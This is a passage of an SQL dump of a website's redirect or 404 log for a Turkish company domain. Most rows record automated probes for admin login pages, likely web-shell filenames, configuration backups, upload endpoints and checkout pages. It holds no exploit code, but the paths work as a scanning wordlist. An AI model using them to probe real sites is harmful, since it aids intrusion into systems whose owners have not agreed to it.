00:00:00',301),(60794,'https://3s-technologies.com.tr/en/siteadmin',NULL,'','',1,0,'2026-04-04 11:48:05','0000-00-00 00:00:00',301),(60795,'https://3s-technologies.com.tr/en/siteadmin/login',NULL,'','',1,0,'2026-04-04 11:48:06','0000-00-00 00:00:00',301),(60796,'https://3s-technologies.com.tr/en/modmin',NULL,'','',1,0,'2026-04-04 11:48:06','0000-00-00 00:00:00',301),(60797,'https://3s-technologies.com.tr/en/moderator',NULL,'','',1,0,'2026-04-04 11:48:07','0000-00-00 00:00:00',301),(60798,'https://3s-technologies.com.tr/en/supervisor',NULL,'','',1,0,'2026-04-04 11:48:08','0000-00-00 00:00:00',301),(60799,'https://3s-technologies.com.tr/en/superadmin',NULL,'','',1,0,'2026-04-04 11:48:08','0000-00-00 00:00:00',301),(60800,'https://3s-technologies.com.tr/en/superadmin/login',NULL,'','',1,0,'2026-04-04 11:48:09','0000-00-00 00:00:00',301),(60801,'https://3s-technologies.com.tr/en/master',NULL,'','',1,0,'2026-04-04 11:48:10','0000-00-00 00:00:00',301),(60802,'https://3s-technologies.com.tr/en/master/login',NULL,'','',1,0,'2026-04-04 11:48:10','0000-00-00 00:00:00',301),(60803,'https://3s-technologies.com.tr/en/root',NULL,'','',1,0,'2026-04-04 11:48:11','0000-00-00 00:00:00',301),(60804,'https://3s-technologies.com.tr/en/root/login',NULL,'','',1,0,'2026-04-04 11:48:11','0000-00-00 00:00:00',301),(60805,'https://3s-technologies.com.tr/en/home.php',NULL,'','',1,0,'2026-04-04 11:48:17','0000-00-00 00:00:00',301),(60806,'https://3s-technologies.com.tr/en/main.php',NULL,'','',1,0,'2026-04-04 11:48:18','0000-00-00 00:00:00',301),(60807,'https://3s-technologies.com.tr/en/default.php',NULL,'','',1,0,'2026-04-04 11:48:18','0000-00-00 00:00:00',301),(60808,'https://3s-technologies.com.tr/en/enter.php',NULL,'','',1,0,'2026-04-04 11:48:19','0000-00-00 00:00:00',301),(60809,'https://3s-technologies.com.tr/en/access.php',NULL,'','',1,0,'2026-04-04 11:48:20','0000-00-00 00:00:00',301),(60810,'https://3s-technologies.com.tr/en/connect.php',NULL,'','',1,0,'2026-04-04 11:48:20','0000-00-00 00:00:00',301),(60811,'https://3s-technologies.com.tr/en/gateway.php',NULL,'','',1,0,'2026-04-04 11:48:21','0000-00-00 00:00:00',301),(60812,'https://3s-technologies.com.tr/en/admin/default.aspx',NULL,'','',1,0,'2026-04-04 11:48:21','0000-00-00 00:00:00',301),(60813,'https://3s-technologies.com.tr/en/admin/login.aspx',NULL,'','',1,0,'2026-04-04 11:48:22','0000-00-00 00:00:00',301),(60814,'https://3s-technologies.com.tr/en/signin.aspx',NULL,'','',1,0,'2026-04-04 11:48:23','0000-00-00 00:00:00',301),(60815,'https://3s-technologies.com.tr/en/panel/default.aspx',NULL,'','',1,0,'2026-04-04 11:48:23','0000-00-00 00:00:00',301),(60816,'https://3s-technologies.com.tr/en/dashboard/default.aspx',NULL,'','',1,0,'2026-04-04 11:48:24','0000-00-00 00:00:00',301),(60817,'http://3s-technologies.com.tr/tr/wp-mail.php/wp-includes/admin.php',NULL,'','',12,0,'2026-04-04 15:16:45','0000-00-00 00:00:00',301),(60818,'http://mail.3s-technologies.com.tr/tr/wp-content/ssd/sallu.php',NULL,'','',2,0,'2026-04-04 17:35:56','0000-00-00 00:00:00',301),(60819,'http://mail.3s-technologies.com.tr/tr/public/filemanager.php',NULL,'','',2,0,'2026-04-04 17:36:34','0000-00-00 00:00:00',301),(60820,'http://mail.3s-technologies.com.tr/tr/wp-content/voga/sallu.php',NULL,'','',2,0,'2026-04-04 17:36:34','0000-00-00 00:00:00',301),(60821,'http://mail.3s-technologies.com.tr/tr/public/manager.php',NULL,'','',2,0,'2026-04-04 17:36:49','0000-00-00 00:00:00',301),(60822,'https://www.3s-technologies.com.tr/tr/feed',NULL,'https://www.3s-technologies.com.tr/feed/','',4,0,'2026-04-04 23:17:13','0000-00-00 00:00:00',301),(60823,'http://mail.3s-technologies.com.tr/tr/r2.php',NULL,'','',8,0,'2026-04-05 10:53:50','0000-00-00 00:00:00',301),(60824,'http://mail.3s-technologies.com.tr/tr/c6jpzoqvtpyem9hdefault.php',NULL,'','',1,0,'2026-04-05 10:53:55','0000-00-00 00:00:00',301),(60825,'http://mail.3s-technologies.com.tr/tr/efpu3yhnrinnltvdefault.php',NULL,'','',11,0,'2026-04-05 10:53:56','0000-00-00 00:00:00',301),(60826,'http://mail.3s-technologies.com.tr/tr/mfptbopeeg7v0sezxnbtgcgscdefault.php',NULL,'','',1,0,'2026-04-05 10:53:56','0000-00-00 00:00:00',301),(60827,'http://mail.3s-technologies.com.tr/tr/jkydqumkiarjmj4default.php',NULL,'','',1,0,'2026-04-05 10:53:59','0000-00-00 00:00:00',301),(60828,'http://mail.3s-technologies.com.tr/tr/n3yumq6q9xwq8ocdefault.php',NULL,'','',6,0,'2026-04-05 10:54:00','0000-00-00 00:00:00',301),(60829,'http://mail.3s-technologies.com.tr/tr/olezrvqmjjpfsucdefault.php',NULL,'','',4,0,'2026-04-05 10:54:01','0000-00-00 00:00:00',301),(60830,'http://mail.3s-technologies.com.tr/tr/pxw8hpvyfvvpojjxvncdefault.php',NULL,'','',1,0,'2026-04-05 10:54:01','0000-00-00 00:00:00',301),(60831,'http://mail.3s-technologies.com.tr/tr/r9pbhistk1lifhnjadpcdefault.php',NULL,'','',4,0,'2026-04-05 10:54:02','0000-00-00 00:00:00',301),(60832,'http://mail.3s-technologies.com.tr/tr/s3fiyj2wgcnf0p1default.php',NULL,'','',4,0,'2026-04-05 10:54:02','0000-00-00 00:00:00',301),(60833,'http://mail.3s-technologies.com.tr/tr/ruabjw00.php',NULL,'','',1,0,'2026-04-05 10:54:08','0000-00-00 00:00:00',301),(60834,'http://mail.3s-technologies.com.tr/tr/wp-4dvn1ew.php',NULL,'','',1,0,'2026-04-05 10:54:09','0000-00-00 00:00:00',301),(60835,'http://mail.3s-technologies.com.tr/tr/wp-rhvi43.php',NULL,'','',1,0,'2026-04-05 10:54:10','0000-00-00 00:00:00',301),(60836,'http://mail.3s-technologies.com.tr/tr/webx.php',NULL,'','',1,0,'2026-04-05 10:54:11','0000-00-00 00:00:00',301),(60837,'http://mail.3s-technologies.com.tr/tr/wp-db.php',NULL,'','',1,0,'2026-04-05 10:54:14','0000-00-00 00:00:00',301),(60838,'http://mail.3s-technologies.com.tr/tr/tool2.php',NULL,'','',1,0,'2026-04-05 10:54:17','0000-00-00 00:00:00',301),(60839,'http://mail.3s-technologies.com.tr/tr/zjllx.php',NULL,'','',1,0,'2026-04-05 10:54:17','0000-00-00 00:00:00',301),(60840,'http://mail.3s-technologies.com.tr/tr/tiny2.php',NULL,'','',9,0,'2026-04-05 10:54:18','0000-00-00 00:00:00',301),(60841,'http://mail.3s-technologies.com.tr/tr/ukaa.php',NULL,'','',1,0,'2026-04-05 10:54:20','0000-00-00 00:00:00',301),(60842,'http://mail.3s-technologies.com.tr/tr/wp-turn.php',NULL,'','',2,0,'2026-04-05 10:54:26','0000-00-00 00:00:00',301),(60843,'http://mail.3s-technologies.com.tr/tr/class-wp-image.php',NULL,'','',9,0,'2026-04-05 10:54:28','0000-00-00 00:00:00',301),(60844,'http://mail.3s-technologies.com.tr/tr/xdd.php',NULL,'','',1,0,'2026-04-05 10:54:34','0000-00-00 00:00:00',301),(60845,'http://mail.3s-technologies.com.tr/tr/roksad1.php',NULL,'','',12,0,'2026-04-05 10:54:35','0000-00-00 00:00:00',301),(60846,'http://mail.3s-technologies.com.tr/tr/update1.php',NULL,'','',1,0,'2026-04-05 10:54:36','0000-00-00 00:00:00',301),(60847,'http://mail.3s-technologies.com.tr/tr/packsin1.php',NULL,'','',12,0,'2026-04-05 10:54:38','0000-00-00 00:00:00',301),(60848,'http://mail.3s-technologies.com.tr/tr/wswer1.php',NULL,'','',2,0,'2026-04-05 10:54:39','0000-00-00 00:00:00',301),(60849,'http://mail.3s-technologies.com.tr/tr/floya.php',NULL,'','',1,0,'2026-04-05 10:54:42','0000-00-00 00:00:00',301),(60850,'http://mail.3s-technologies.com.tr/tr/wolf.php',NULL,'','',2,0,'2026-04-05 10:54:42','0000-00-00 00:00:00',301),(60851,'http://mail.3s-technologies.com.tr/tr/om.php',NULL,'','',2,0,'2026-04-05 10:54:44','0000-00-00 00:00:00',301),(60852,'http://mail.3s-technologies.com.tr/tr/store.php',NULL,'','',1,0,'2026-04-05 10:54:47','0000-00-00 00:00:00',301),(60853,'http://mail.3s-technologies.com.tr/tr/wpyur.php',NULL,'','',1,0,'2026-04-05 10:54:49','0000-00-00 00:00:00',301),(60854,'http://mail.3s-technologies.com.tr/tr/wglum.php',NULL,'','',1,0,'2026-04-05 10:54:50','0000-00-00 00:00:00',301),(60855,'http://mail.3s-technologies.com.tr/tr/czoaz8queqev.php',NULL,'','',1,0,'2026-04-05 10:54:51','0000-00-00 00:00:00',301),(60856,'http://mail.3s-technologies.com.tr/tr/ttrc68yle0tb.php',NULL,'','',1,0,'2026-04-05 10:54:52','0000-00-00 00:00:00',301),(60857,'http://mail.3s-technologies.com.tr/tr/wp-ox9eoqdk.php',NULL,'','',1,0,'2026-04-05 10:54:53','0000-00-00 00:00:00',301),(60858,'http://mail.3s-technologies.com.tr/tr/wp-4qtafzz.php',NULL,'','',1,0,'2026-04-05 10:54:53','0000-00-00 00:00:00',301),(60859,'http://mail.3s-technologies.com.tr/tr/gilo.php',NULL,'','',1,0,'2026-04-05 10:54:54','0000-00-00 00:00:00',301),(60860,'http://mail.3s-technologies.com.tr/tr/x7r.php',NULL,'','',1,0,'2026-04-05 10:54:55','0000-00-00 00:00:00',301),(60861,'http://mail.3s-technologies.com.tr/tr/wp-3x94erjd.php',NULL,'','',1,0,'2026-04-05 10:54:56','0000-00-00 00:00:00',301),(60862,'http://mail.3s-technologies.com.tr/tr/riz.php',NULL,'','',2,0,'2026-04-05 10:54:57','0000-00-00 00:00:00',301),(60863,'http://mail.3s-technologies.com.tr/tr/xyz.php',NULL,'','',1,0,'2026-04-05 10:54:58','0000-00-00 00:00:00',301),(60864,'http://mail.3s-technologies.com.tr/tr/ympoo.php',NULL,'','',1,0,'2026-04-05 10:55:00','0000-00-00 00:00:00',301),(60865,'http://mail.3s-technologies.com.tr/tr/haojj.php',NULL,'','',1,0,'2026-04-05 10:55:01','0000-00-00 00:00:00',301),(60866,'http://3s-technologies.com.tr/tr/r2.php',NULL,'','',12,0,'2026-04-05 12:06:41','0000-00-00 00:00:00',301),(60867,'http://3s-technologies.com.tr/tr/n3yumq6q9xwq8ocdefault.php',NULL,'','',15,0,'2026-04-05 12:06:54','0000-00-00 00:00:00',301),(60868,'http://3s-technologies.com.tr/tr/olezrvqmjjpfsucdefault.php',NULL,'','',13,0,'2026-04-05 12:06:55','0000-00-00 00:00:00',301),(60869,'http://3s-technologies.com.tr/tr/pxw8hpvyfvvpojjxvncdefault.php',NULL,'','',1,0,'2026-04-05 12:06:56','0000-00-00 00:00:00',301),(60870,'http://3s-technologies.com.tr/tr/r9pbhistk1lifhnjadpcdefault.php',NULL,'','',13,0,'2026-04-05 12:06:56','0000-00-00 00:00:00',301),(60871,'http://3s-technologies.com.tr/tr/s3fiyj2wgcnf0p1default.php',NULL,'','',13,0,'2026-04-05 12:06:57','0000-00-00 00:00:00',301),(60872,'http://3s-technologies.com.tr/tr/ruabjw00.php',NULL,'','',1,0,'2026-04-05 12:07:05','0000-00-00 00:00:00',301),(60873,'http://3s-technologies.com.tr/tr/wp-4dvn1ew.php',NULL,'','',1,0,'2026-04-05 12:07:06','0000-00-00 00:00:00',301),(60874,'http://3s-technologies.com.tr/tr/wp-rhvi43.php',NULL,'','',1,0,'2026-04-05 12:07:07','0000-00-00 00:00:00',301),(60875,'http://3s-technologies.com.tr/tr/webx.php',NULL,'','',1,0,'2026-04-05 12:07:08','0000-00-00 00:00:00',301),(60876,'http://3s-technologies.com.tr/tr/hhxc.php',NULL,'','',19,0,'2026-04-05 12:07:09','0000-00-00 00:00:00',301),(60877,'http://3s-technologies.com.tr/tr/tool2.php',NULL,'','',1,0,'2026-04-05 12:07:15','0000-00-00 00:00:00',301),(60878,'http://3s-technologies.com.tr/tr/zjllx.php',NULL,'','',1,0,'2026-04-05 12:07:16','0000-00-00 00:00:00',301),(60879,'http://3s-technologies.com.tr/tr/tiny2.php',NULL,'','',14,0,'2026-04-05 12:07:17','0000-00-00 00:00:00',301),(60880,'http://3s-technologies.com.tr/tr/ukaa.php',NULL,'','',1,0,'2026-04-05 12:07:20','0000-00-00 00:00:00',301),(60881,'http://3s-technologies.com.tr/tr/wp-turn.php',NULL,'','',3,0,'2026-04-05 12:07:31','0000-00-00 00:00:00',301),(60882,'http://3s-technologies.com.tr/tr/class-wp-image.php',NULL,'','',16,0,'2026-04-05 12:07:33','0000-00-00 00:00:00',301),(60883,'http://3s-technologies.com.tr/tr/roksad1.php',NULL,'','',17,0,'2026-04-05 12:07:44','0000-00-00 00:00:00',301),(60884,'http://3s-technologies.com.tr/tr/update1.php',NULL,'','',1,0,'2026-04-05 12:07:45','0000-00-00 00:00:00',301),(60885,'http://3s-technologies.com.tr/tr/packsin1.php',NULL,'','',18,0,'2026-04-05 12:07:48','0000-00-00 00:00:00',301),(60886,'http://3s-technologies.com.tr/tr/wswer1.php',NULL,'','',3,0,'2026-04-05 12:07:50','0000-00-00 00:00:00',301),(60887,'http://3s-technologies.com.tr/tr/floya.php',NULL,'','',1,0,'2026-04-05 12:07:53','0000-00-00 00:00:00',301),(60888,'http://3s-technologies.com.tr/tr/wpyur.php',NULL,'','',1,0,'2026-04-05 12:08:04','0000-00-00 00:00:00',301),(60889,'http://3s-technologies.com.tr/tr/wglum.php',NULL,'','',1,0,'2026-04-05 12:08:04','0000-00-00 00:00:00',301),(60890,'http://3s-technologies.com.tr/tr/czoaz8queqev.php',NULL,'','',1,0,'2026-04-05 12:08:07','0000-00-00 00:00:00',301),(60891,'http://3s-technologies.com.tr/tr/ttrc68yle0tb.php',NULL,'','',1,0,'2026-04-05 12:08:07','0000-00-00 00:00:00',301),(60892,'http://3s-technologies.com.tr/tr/wp-ox9eoqdk.php',NULL,'','',1,0,'2026-04-05 12:08:09','0000-00-00 00:00:00',301),(60893,'http://3s-technologies.com.tr/tr/wp-4qtafzz.php',NULL,'','',1,0,'2026-04-05 12:08:09','0000-00-00 00:00:00',301),(60894,'http://3s-technologies.com.tr/tr/gilo.php',NULL,'','',1,0,'2026-04-05 12:08:10','0000-00-00 00:00:00',301),(60895,'http://3s-technologies.com.tr/tr/x7r.php',NULL,'','',1,0,'2026-04-05 12:08:12','0000-00-00 00:00:00',301),(60896,'http://3s-technologies.com.tr/tr/wp-3x94erjd.php',NULL,'','',1,0,'2026-04-05 12:08:14','0000-00-00 00:00:00',301),(60897,'http://3s-technologies.com.tr/tr/riz.php',NULL,'','',3,0,'2026-04-05 12:08:15','0000-00-00 00:00:00',301),(60898,'http://3s-technologies.com.tr/tr/ympoo.php',NULL,'','',1,0,'2026-04-05 12:08:21','0000-00-00 00:00:00',301),(60899,'http://3s-technologies.com.tr/tr/she.php',NULL,'','',1,0,'2026-04-05 12:08:21','0000-00-00 00:00:00',301),(60900,'http://3s-technologies.com.tr/tr/haojj.php',NULL,'','',1,0,'2026-04-05 12:08:22','0000-00-00 00:00:00',301),(60901,'http://3s-technologies.com.tr/tr/prosell2.php',NULL,'','',6,0,'2026-04-05 13:28:18','0000-00-00 00:00:00',301),(60902,'http://mail.3s-technologies.com.tr/tr/nco.php',NULL,'','',1,0,'2026-04-05 19:49:03','0000-00-00 00:00:00',301),(60903,'http://mail.3s-technologies.com.tr/tr/nti.php',NULL,'','',1,0,'2026-04-05 19:49:06','0000-00-00 00:00:00',301),(60904,'http://mail.3s-technologies.com.tr/tr/dx.php',NULL,'','',30,0,'2026-04-05 19:49:07','0000-00-00 00:00:00',301),(60905,'http://mail.3s-technologies.com.tr/tr/enacting.php',NULL,'','',1,0,'2026-04-05 19:49:07','0000-00-00 00:00:00',301),(60906,'http://mail.3s-technologies.com.tr/tr/act.php',NULL,'','',1,0,'2026-04-05 19:49:09','0000-00-00 00:00:00',301),(60907,'http://mail.3s-technologies.com.tr/tr/prosell2.php',NULL,'','',1,0,'2026-04-05 19:49:10','0000-00-00 00:00:00',301),(60908,'http://mail.3s-technologies.com.tr/tr/bdktk.php',NULL,'','',4,0,'2026-04-05 19:49:10','0000-00-00 00:00:00',301),(60909,'http://mail.3s-technologies.com.tr/tr/bx.php',NULL,'','',1,0,'2026-04-05 19:49:11','0000-00-00 00:00:00',301),(60910,'http://mail.3s-technologies.com.tr/tr/wp-stat.php',NULL,'','',1,0,'2026-04-05 19:49:13','0000-00-00 00:00:00',301),(60911,'http://mail.3s-technologies.com.tr/tr/lolz.php',NULL,'','',1,0,'2026-04-05 19:49:14','0000-00-00 00:00:00',301),(60912,'http://mail.3s-technologies.com.tr/tr/wp-tymanage.php',NULL,'','',1,0,'2026-04-05 19:49:15','0000-00-00 00:00:00',301),(60913,'http://mail.3s-technologies.com.tr/tr/congeree.php',NULL,'','',1,0,'2026-04-05 19:49:16','0000-00-00 00:00:00',301),(60914,'http://mail.3s-technologies.com.tr/tr/amxloxxr.php',NULL,'','',5,0,'2026-04-05 19:49:17','0000-00-00 00:00:00',301),(60915,'http://mail.3s-technologies.com.tr/tr/greateb.php',NULL,'','',1,0,'2026-04-05 19:49:18','0000-00-00 00:00:00',301),(60916,'http://mail.3s-technologies.com.tr/tr/uploads/index.php',NULL,'','',1,0,'2026-04-05 19:49:18','0000-00-00 00:00:00',301),(60917,'http://mail.3s-technologies.com.tr/tr/multirole.php',NULL,'','',1,0,'2026-04-05 19:49:19','0000-00-00 00:00:00',301),(60918,'http://3s-technologies.com.tr/tr/?r?nler/dalga-lehim',NULL,'http://3s-technologies.com.tr','',2,0,'2026-04-06 01:13:35','0000-00-00 00:00:00',301),(60919,'http://3s-technologies.com.tr/tr/eva.php',NULL,'','',3,0,'2026-04-06 01:22:42','0000-00-00 00:00:00',301),(60920,'http://3s-technologies.com.tr/tr/public/mi35rzhmg1zj1vuxdefault.php',NULL,'','',18,0,'2026-04-06 11:54:29','0000-00-00 00:00:00',301),(60921,'http://mail.3s-technologies.com.tr/tr/bthil.php',NULL,'','',27,0,'2026-04-06 13:34:33','0000-00-00 00:00:00',301),(60922,'http://mail.3s-technologies.com.tr/tr/admina.php',NULL,'','',1,0,'2026-04-06 13:34:34','0000-00-00 00:00:00',301),(60923,'http://mail.3s-technologies.com.tr/tr/turkshell.php',NULL,'','',3,0,'2026-04-06 13:34:34','0000-00-00 00:00:00',301),(60924,'http://mail.3s-technologies.com.tr/tr/esp.php',NULL,'','',1,0,'2026-04-06 13:34:35','0000-00-00 00:00:00',301),(60925,'http://mail.3s-technologies.com.tr/tr/tea.php',NULL,'','',7,0,'2026-04-06 13:34:36','0000-00-00 00:00:00',301),(60926,'http://mail.3s-technologies.com.tr/tr/qqa.php',NULL,'','',4,0,'2026-04-06 13:34:37','0000-00-00 00:00:00',301),(60927,'http://mail.3s-technologies.com.tr/tr/bogles.php',NULL,'','',3,0,'2026-04-06 13:34:38','0000-00-00 00:00:00',301),(60928,'http://mail.3s-technologies.com.tr/tr/seo.php',NULL,'','',8,0,'2026-04-06 13:34:39','0000-00-00 00:00:00',301),(60929,'http://3s-technologies.com.tr/tr/clque.php',NULL,'','',3,0,'2026-04-06 14:56:13','0000-00-00 00:00:00',301),(60930,'http://3s-technologies.com.tr/tr/subs/pics/qa.php',NULL,'','',1,0,'2026-04-06 14:56:40','0000-00-00 00:00:00',301),(60931,'http://www.3s-technologies.com.tr/tr/bthil.php',NULL,'','',5,0,'2026-04-06 17:37:43','0000-00-00 00:00:00',301),(60932,'http://www.3s-technologies.com.tr/tr/admina.php',NULL,'','',1,0,'2026-04-06 17:37:44','0000-00-00 00:00:00',301),(60933,'http://www.3s-technologies.com.tr/tr/turkshell.php',NULL,'','',2,0,'2026-04-06 17:37:44','0000-00-00 00:00:00',301),(60934,'http://www.3s-technologies.com.tr/tr/esp.php',NULL,'','',1,0,'2026-04-06 17:37:45','0000-00-00 00:00:00',301),(60935,'http://www.3s-technologies.com.tr/tr/tea.php',NULL,'','',2,0,'2026-04-06 17:37:46','0000-00-00 00:00:00',301),(60936,'http://www.3s-technologies.com.tr/tr/bypltspd.php',NULL,'','',1,0,'2026-04-06 17:37:47','0000-00-00 00:00:00',301),(60937,'http://www.3s-technologies.com.tr/tr/qqa.php',NULL,'','',2,0,'2026-04-06 17:37:47','0000-00-00 00:00:00',301),(60938,'http://www.3s-technologies.com.tr/tr/bogles.php',NULL,'','',1,0,'2026-04-06 17:37:48','0000-00-00 00:00:00',301),(60939,'http://www.3s-technologies.com.tr/tr/seo.php',NULL,'','',2,0,'2026-04-06 17:37:48','0000-00-00 00:00:00',301),(60940,'http://3s-technologies.com.tr/tr/bthil.php',NULL,'','',69,0,'2026-04-06 18:06:45','0000-00-00 00:00:00',301),(60941,'http://3s-technologies.com.tr/tr/css/database.php',NULL,'','',9,0,'2026-04-06 18:06:48','0000-00-00 00:00:00',301),(60942,'https://3s-technologies.com.tr/en/ürünler/smd-düşük-hızlı',NULL,'','',1,0,'2026-04-06 21:41:02','0000-00-00 00:00:00',301),(60943,'https://3s-technologies.com.tr/en/hakkımızda',NULL,'','',2,0,'2026-04-06 21:41:33','0000-00-00 00:00:00',301),(60944,'http://3s-technologies.com.tr/en/llpxweve.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2026-04-07 02:35:14','0000-00-00 00:00:00',301),(60945,'https://3s-technologies.com.tr/en/jupiufoa.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2026-04-07 02:35:16','0000-00-00 00:00:00',301),(60946,'http://3s-technologies.com.tr/tr/admin/plugins/plupload/examples/upload.php',NULL,'','',2,0,'2026-04-07 05:38:48','0000-00-00 00:00:00',301),(60947,'http://3s-technologies.com.tr/tr/config-backup.php',NULL,'','',5,0,'2026-04-07 07:05:44','0000-00-00 00:00:00',301),(60948,'http://3s-technologies.com.tr/tr/wp-conffq.php',NULL,'','',2,0,'2026-04-07 07:05:56','0000-00-00 00:00:00',301),(60949,'http://3s-technologies.com.tr/tr/wp-headre.php',NULL,'','',2,0,'2026-04-07 07:05:59','0000-00-00 00:00:00',301),(60950,'http://3s-technologies.com.tr/tr/wp-start.php',NULL,'','',2,0,'2026-04-07 07:06:04','0000-00-00 00:00:00',301),(60951,'http://3s-technologies.com.tr/tr/xmlrpc_old.php',NULL,'','',1,0,'2026-04-07 07:06:07','0000-00-00 00:00:00',301),(60952,'http://3s-technologies.com.tr/tr/xxmlrpc.php',NULL,'','',1,0,'2026-04-07 07:06:07','0000-00-00 00:00:00',301),(60953,'http://3s-technologies.com.tr/tr/wp-conffg.php',NULL,'','',8,0,'2026-04-07 07:06:09','0000-00-00 00:00:00',301),(60954,'http://3s-technologies.com.tr/tr/qqa.php',NULL,'','',4,0,'2026-04-07 13:43:34','0000-00-00 00:00:00',301),(60955,'http://3s-technologies.com.tr/tr/turkshell.php',NULL,'','',8,0,'2026-04-07 13:43:36','0000-00-00 00:00:00',301),(60956,'http://3s-technologies.com.tr/tr/qqqa.php',NULL,'','',1,0,'2026-04-07 13:43:38','0000-00-00 00:00:00',301),(60957,'http://www.3s-technologies.com.tr/tr/gpt-sh.php',NULL,'','',3,0,'2026-04-07 17:25:38','0000-00-00 00:00:00',301),(60958,'http://www.3s-technologies.com.tr/tr/wp-content/ssd/sallu.php',NULL,'','',1,0,'2026-04-07 17:25:50','0000-00-00 00:00:00',301),(60959,'http://www.3s-technologies.com.tr/tr/app/webroot/filemanager.php',NULL,'','',1,0,'2026-04-07 17:26:18','0000-00-00 00:00:00',301),(60960,'http://www.3s-technologies.com.tr/tr/public/filemanager.php',NULL,'','',1,0,'2026-04-07 17:26:21','0000-00-00 00:00:00',301),(60961,'http://www.3s-technologies.com.tr/tr/wp-content/voga/sallu.php',NULL,'','',1,0,'2026-04-07 17:26:22','0000-00-00 00:00:00',301),(60962,'http://www.3s-technologies.com.tr/tr/public/manager.php',NULL,'','',1,0,'2026-04-07 17:26:33','0000-00-00 00:00:00',301),(60963,'https://www.3s-technologies.com.tr/tr/templates/astroid/index.php',NULL,'','',1,0,'2026-04-07 21:28:28','0000-00-00 00:00:00',301),(60964,'http://mail.3s-technologies.com.tr/tr/aevly.php',NULL,'','',12,0,'2026-04-08 00:51:45','0000-00-00 00:00:00',301),(60965,'http://mail.3s-technologies.com.tr/tr/css/database.php',NULL,'','',2,0,'2026-04-08 00:51:48','0000-00-00 00:00:00',301),(60966,'http://3s-technologies.com.tr/tr/some/other.php',NULL,'','',1,0,'2026-04-08 08:59:49','0000-00-00 00:00:00',301),(60967,'https://3s-technologies.com.tr/tr/commande',NULL,'','',3,0,'2026-04-08 09:19:04','0000-00-00 00:00:00',301),(60968,'https://3s-technologies.com.tr/tr/checkout/',NULL,'','',6,0,'2026-04-08 09:19:04','0000-00-00 00:00:00',301),(60969,'https://3s-technologies.com.tr/tr/carrello',NULL,'','',3,0,'2026-04-08 09:19:04','0000-00-00 00:00:00',301),(60970,'https://3s-technologies.com.tr/tr/onestepcheckout',NULL,'','',3,0,'2026-04-08 09:19:04','0000-00-00 00:00:00',301),(60971,'https://3s-technologies.com.tr/tr/wp-json/wc/store/v1/cart',NULL,'','',3,0,'2026-04-08 09:19:04','0000-00-00 00:00:00',301),(60972,'https://3s-technologies.com.tr/tr/donations',NULL,'','',3,0,'2026-04-08 09:19:04','0000-00-00 00:00:00',301),(60973,'https://3s-technologies.com.tr/tr/checkout/cart',NULL,'','',3,0,'2026-04-08 09:19:04','0000-00-00 00:00:00',301),(60974,'https://3s-technologies.com.tr/tr/kasse',NULL,'','',3,0,'2026-04-08 09:19:04','0000-00-00 00:00:00',301),(60975,'https://3s-technologies.com.tr/tr/give',NULL,'','',3,0,'2026-04-08 09:19:05','0000-00-00 00:00:00',301),(60976,'https://3s-technologies.com.tr/tr/warenkorb',NULL,'','',3,0,'2026-04-08 09:19:04','0000-00-00 00:00:00',301),(60977,'https://3s-technologies.com.tr/tr/cart/checkout',NULL,'','',3,0,'2026-04-08 09:19:05','0000-00-00 00:00:00',301),(60978,'https://3s-technologies.com.tr/tr/comprar',NULL,'','',3,0,'2026-04-08 09:19:05','0000-00-00 00:00:00',301),(60979,'https://3s-technologies.com.tr/tr/finalizar-compra',NULL,'','',3,0,'2026-04-08 09:19:08','0000-00-00 00:00:00',301),(60980,'https://3s-technologies.com.tr/tr/checkout/payment',NULL,'','',3,0,'2026-04-08 09:19:08','0000-00-00 00:00:00',301),(60981,'https://3s-technologies.com.tr/tr/make-a-payment',NULL,'','',3,0,'2026-04-08 09:19:08','0000-00-00 00:00:00',301),(60982,'https://3s-technologies.com.tr/tr/pay',NULL,'','',3,0,'2026-04-08 09:19:08','0000-00-00 00:00:00',301),(60983,'https://3s-technologies.com.tr/tr/pay-an-invoice/',NULL,'','',3,0,'2026-04-08 09:19:08','0000-00-00 00:00:00',301),(60984,'https://3s-technologies.com.tr/tr/panier',NULL,'','',3,0,'2026-04-08 09:19:08','0000-00-00 00:00:00',301),(60985,'http://mail.3s-technologies.com.tr/tr/wpb.php',NULL,'','',4,0,'2026-04-08 11:12:04','0000-00-00 00:00:00',301),(60986,'http://www.3s-technologies.com.tr/tr/green.php',NULL,'','',1,0,'2026-04-08 11:57:46','0000-00-00 00:00:00',301),(60987,'http://www.3s-technologies.com.tr/tr/dass.php',NULL,'','',5,0,'2026-04-08 11:57:52','0000-00-00 00:00:00',301),(60988,'http://www.3s-technologies.com.tr/tr/asasx.php',NULL,'','',2,0,'2026-04-08 11:57:58','0000-00-00 00:00:00',301),(60989,'http://www.3s-technologies.com.tr/tr/public/mi35rzhmg1zj1vuxdefault.php',NULL,'','',3,0,'2026-04-08 11:58:05','0000-00-00 00:00:00',301),(60990,'http://www.3s-technologies.com.tr/tr/ws87.php',NULL,'','',2,0,'2026-04-08 11:58:17','0000-00-00 00:00:00',301),(60991,'http://www.3s-technologies.com.tr/tr/hhxc.php',NULL,'','',2,0,'2026-04-08 11:58:30','0000-00-00 00:00:00',301),(60992,'http://www.3s-technologies.com.tr/tr/wtiiy.php',NULL,'','',2,0,'2026-04-08 11:58:32','0000-00-00 00:00:00',301),(60993,'https://3s-technologies.com.tr/en/media/astroid/css/debug.css',NULL,'https://3s-technologies.com.tr/en/','',7,0,'2026-04-08 12:25:39','0000-00-00 00:00:00',301),(60994,'https://3s-technologies.com.tr/en/language/en-gb/en-gb.astroid.ini',NULL,'https://3s-technologies.com.tr/en/media/astroid/css/debug.css','',7,0,'2026-04-08 12:25:40','0000-00-00 00:00:00',301),(60995,'https://www.3s-technologies.com.tr/tr/\"/components/com_virtuemart/assets/js/chosen.jquery.min.js?vmver=1ca80efd\"',NULL,'https://www.3s-technologies.com.tr/%22/components/com_virtuemart/assets/js/chosen.jquery.min.js?vmver=1ca80efd\"','',2,0,'2026-04-08 14:19:55','0000-00-00 00:00:00',301),(60996,'http://mail.3s-technologies.com.tr/tr/index/chosen.php',NULL,'','',8,0,'2026-04-08 18:16:00','0000-00-00 00:00:00',301),(60997,'http://mail.3s-technologies.com.tr/tr/about/chosen.php',NULL,'','',8,0,'2026-04-08 18:16:00','0000-00-00 00:00:00',301),(60998,'http://mail.3s-technologies.com.tr/tr/as/chosen.php',NULL,'','',8,0,'2026-04-08 18:16:01','0000-00-00 00:00:00',301),(60999,'http://mail.3s-technologies.com.tr/tr/file/chosen.php',NULL,'','',8,0,'2026-04-08 18:16:02','0000-00-00 